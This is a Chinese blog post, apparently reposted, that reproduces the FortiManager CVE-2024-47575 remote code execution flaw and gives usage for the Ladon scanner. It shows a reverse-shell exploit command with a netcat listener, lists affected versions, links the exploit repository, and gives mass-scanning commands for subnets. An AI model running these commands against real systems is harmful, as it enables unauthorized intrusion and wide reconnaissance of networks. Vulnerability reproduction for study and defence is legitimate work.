FortiManager CVE-2024-47575 RCE漏洞复现
2024-11-20 23:40:0 Author: k8gege.org(查看原文) 阅读量:0 收藏

<% Visit %>

Ladon信息收集、资产探测、WhatCMS识别 飞塔FortiManager

image

cve-2024-47575 漏洞复现 反弹Shell

1
2
LadonGUI---NetCat---监听4444
python CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.8 --lport 4444 --action exploit

image

影响版本

1
2
3
4
5
6
7
8
9
10
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

模块名称

WhatCMS、CMS、CmsInfo等,Cobalt Strike下用法一致,输入URL,仅识别URL对应指纹,输入非URL时,会探测常见CMS网站、网络设备、打印机、路由器、防火墙、VPN等,由于端口多速度慢,但收集的资产会更全(前提是目标有)

指定URL

1
2
Ladon http://192.168.1.8 CMS
Ladon http://192.168.1.8 WhatCMS

指定IP

1
2
Ladon 192.168.1.8 CMS
Ladon 192.168.1.8 WhatCMS

批量URL

1
Ladon url.txt CMS

PS:TXT可存放IP、IP:Port、URL等格式

批量IP

1
2
Ladon ip.txt WhatCMS
Ladon noping ip.txt CMS

指定C段

1
2
3
4
5
Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

指定B段

1
2
3
4
5
Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

指定A段

1
2
3
4
5
Ladon 192.168.1.8/a WhatCMS
Ladon noping 192.168.1.8/a CMS

Ladon 192.168.1.8/a CMS
Ladon noping 192.168.1.8/a CMS

批量C段

1
2
3
4
5
Ladon ip24.txt CMS
Ladon ipc.txt CMS

Ladon noping ip24.txt CMS
Ladon noping ipc.txt CMS

PS: TXT存放多个目标的C段IP

批量B段

1
2
Ladon ip16.txt CMS
Ladon noping ip16.txt CMS

PS: TXT存放多个目标的B段IP

批量网段

1
2
Ladon cidr.txt CMS
Ladon noping cidr.txt CMS

PS: TXT存放各种IP网段,全网无差别扫描

更多功能 使用教程

http://k8gege.org/Ladon/


文章来源: http://k8gege.org/p/CVE-2024-47575.html
如有侵权请联系:admin#unsafe.sh